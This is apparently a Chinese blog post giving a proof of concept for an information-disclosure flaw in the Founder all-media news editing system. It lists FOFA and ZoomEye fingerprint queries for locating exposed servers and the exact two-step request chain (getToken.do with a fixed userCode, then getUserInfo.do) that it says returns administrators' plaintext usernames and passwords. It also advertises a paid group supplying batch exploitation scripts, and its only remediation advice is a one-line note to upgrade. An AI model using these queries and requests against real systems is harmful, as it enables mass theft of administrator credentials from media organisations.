0x01 免责声明
文章内容仅供日常学习使用,请勿非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。如有内容争议或侵权,我们会及时删除。
0x02 漏洞描述
方正电子在传媒行业30多年的技术深耕为基础,与媒体单位的融合进程无缝适配,助力媒体单位逐步破除采编部门自成一体的藩篱,破除传统媒体、新闻网站和新媒体采编发环节的壁垒,创新内部组织结构,建立采编分离、全媒体生产的运行机制
方正全媒体采编系统getUserInfo.do、可获取管理员明文账号和密码。
0x03 测绘查询-系统指纹
fofa:app="FOUNDER-全媒体采编系统"
zoomeye:title:"全媒体采编"
0x04 漏洞复现
1、访问漏洞系统
2、GET访问URL后面加上漏洞地址获取token
/newsedit/tokenHelp/getToken.do?userCode=a18f178d935d2284a771f6f5903d7160漏洞URL地址后面加上刚才获取的token
/newsedit/tokenHelp/getUserInfo.do?token=替换为token值
方正全媒体采编系统敏感信息泄露、可获取账号和密码。
加入帮会获取批量验证脚本,帮会每天更新漏洞nday、1day漏洞poc
扫描也可加入:
0x05 漏洞修复建议
系统已发布漏洞修复版本,建议升级到最新版本:
标签:采编,畅享,媒体,do,帮会,1day,token,账号密码,漏洞 From: https://blog.csdn.net/d2407169866/article/details/139296546